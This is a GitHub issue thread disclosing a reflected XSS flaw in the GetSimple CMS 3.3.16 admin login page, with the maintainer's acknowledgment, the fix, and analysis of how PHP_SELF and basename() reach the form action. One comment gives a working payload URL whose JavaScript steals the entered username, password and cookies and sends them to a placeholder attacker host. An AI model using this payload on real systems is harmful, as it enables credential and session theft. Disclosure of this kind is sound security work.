Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16 in 'admin/index.php' #1330

Closed
boku7 opened this issue Aug 12, 2020 · 9 comments

Comments

@boku7
Copy link

boku7 commented Aug 12, 2020

Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16 in 'admin/index.php' login portal webpage allows remote attackers to execute JavaScript code in the clients browser & harvest login credentials via client clicking a link, entering credentials, and submitting login form.

@boku7
Copy link
Author

boku7 commented Jan 20, 2021

Any update on this? I signed up and messaged all admins on GS forum and got 1 reply from Shawn.
I sent Shawn the full disclosure of the issue back in August 2020.
I have not recieved any further replies to my queries.
Thank you

@tablatronix
Copy link
Member

Not sure I ever got the email, let me check

@tablatronix
Copy link
Member

Got it, overlooked

@tablatronix
Copy link
Member

tablatronix commented Jan 20, 2021

Stupid question, mostly a curiosity do you know WHY it breaks the css? I see no reason it should

http://localhost:8888/dev/getsimple/develop/admin/index.php/asdfasdfasdfasdfasf
strange behavior , kind of interesting,

@tablatronix
Copy link
Member

d1e7eb5

@tablatronix tablatronix added this to the 3.3.17 milestone Jan 20, 2021
@boku7
Copy link
Author

boku7 commented Jan 20, 2021

Its your myself(false) function (defined in basic.php) that is echo'd into the form action.

image

  • This easily shows the issue when you assign the result to a variable.

Analysis

  • Add a variable to see the results of your echo myself(false) function that is injected into the form action.
  • Set a breakpoint on line 32 & 33 of the /admin/index.php page.

image

  • Step into the myself function. If false, the result is:
return htmlentities(basename($_SERVER['PHP_SELF']), ENT_QUOTES);

image

  • See here that:
 $_SERVER[PHP_SELF'] = "/admin/index.php/breakout"

image

  • The PHP function basename() "Returns trailing name component of path"

image

https://www.php.net/manual/en/function.basename.php

  • Since there is no GET arguments sent in the request:
$_SERVER['QUERY_STRING'] = ""

As a final result, we end up with:
image

The above "breakout?" is HTML Encoded, but since it's already the action of a form, it will execute javascript put there when the form is posted.

The '?' at the end presents some initial complications, but it can be discarded out as a comment by adding '//' at the end (URL Encoded).

The HTML Encoding can also be bypassed, as since its JavaScript, you can just use decodeURIComponent() to get any character back you want to use.

Example Payload to steal username and password:

http://<TARGET>/admin/index.php/index/javascript:var dFslash = "%2f%2f";var username = document.forms[0].elements[0].value;var password = document.forms[0].elements[1].value;var uri = "http:"+decodeURIComponent(dFslash)+"<ATTACKER>?|USER="+username+"|PASS="+password+"|"+document.cookie;xhr = new XMLHttpRequest();xhr.open("GET", uri, true);xhr.send();alert("Welcome "+username+"! Sending your credentails and session to a remote attacker!");window.location.replace("test");%2f%2f

@tablatronix
Copy link
Member

tablatronix commented Jan 20, 2021

Yeah its already fixed in 3.4, PHP_SELF is all over the place, added mitigation in 3.3.17, will have to look through the rest for hardcoded ones

Thanks for the full disclosure, still wondering about the CSS flow breaking.... lol

@boku7
Copy link
Author

boku7 commented Jan 20, 2021

CSS breaks because the page Style.php (called by the login /admin/index.php page) used to render CSS resolves to /admin/index.php, due to how it is included into the /admin/index.php login page via the include to /admin/template/header.php (line 33).

image

  • See above that path for the href is relative
 href="template/style.php?

image

  • Here you can see in the client browser DOM, the page for CSS resolves to:
http://localhost/admin/index.php/template/style.php?s=&v=3.3.16

Due to how the routing works for apache/php, this just returns the index.php page again, not the CSS page.
image
image

Call Chain Analysis

  • /admin/index.php calls the get_template() function whick exists in /admin/inc/template_functions.php
    image

  • This includes the template/header.php page
    image

@tablatronix
Copy link
Member

tablatronix commented Jan 20, 2021

doh, thanks!, I saw it loading and no network error, all assets in 3.4 are absolute now, except for style.php, that might be a bug. !!

Interesting that apache doesn't discard pathing after .php, I never noticed this before.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants